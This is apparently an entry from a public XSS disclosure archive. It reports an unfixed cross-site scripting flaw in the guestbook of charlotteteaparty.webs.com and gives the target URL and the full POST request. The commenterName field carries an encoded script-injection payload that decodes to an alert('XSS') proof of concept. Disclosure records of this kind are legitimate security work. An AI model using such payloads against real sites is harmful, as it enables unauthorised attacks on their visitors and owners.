Security researcher starofale, has submitted on 19/04/2009 a cross-site-scripting (XSS) vulnerability affecting charlotteteaparty.webs.com, which at the time of submission ranked 392 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 21/11/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 19/04/2009 |
Date published: 21/11/2010 |
Fixed? Mail us! | Status: UNFIXED |
Author: starofale |
Domain: charlotteteaparty.webs.com |
Category: XSS |
Pagerank: 392 |
URL: http://charlotteteaparty.webs.com/apps/guestbook/ |
POST: POSTDATA=appId=625&streamId=1178300&name=guestbook_comments_39798521&namespace=default&linkbackURL=h ttp%3A%2F%2Fcharlotteteaparty.webs.com%2Fapps%2Fguestbook%2F&thumbnailURL=&returnURL=http%3A%2F%2Fch arlotteteaparty.webs.com%2Fapps%2Fguestbook%2F&commenterName=%26%23x27%3B%26%23x29%3B%26%23x22%3B%26 %23x3E%3B%26%23x3C%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%26%23x 3E%3B%26%23x61%3B%26%23x6C%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%26%23x28%3B%26%23x22%3B%26%23x58%3 B%26%23x53%3B%26%23x53%3B%26%23x22%3B%26%23x29%3B%26%23x3C%3B%26%23x2F%3B%26%23x73%3B%26%23x63%3B%26 %23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%26%23x3E%3B&commenterEmail=bob%40job.com&body=xss+vune rable+%28might+want+to+fix+this%29&submit.x=67&submit.y=21&submit=Submit |
Click here to view the mirror
|
|
|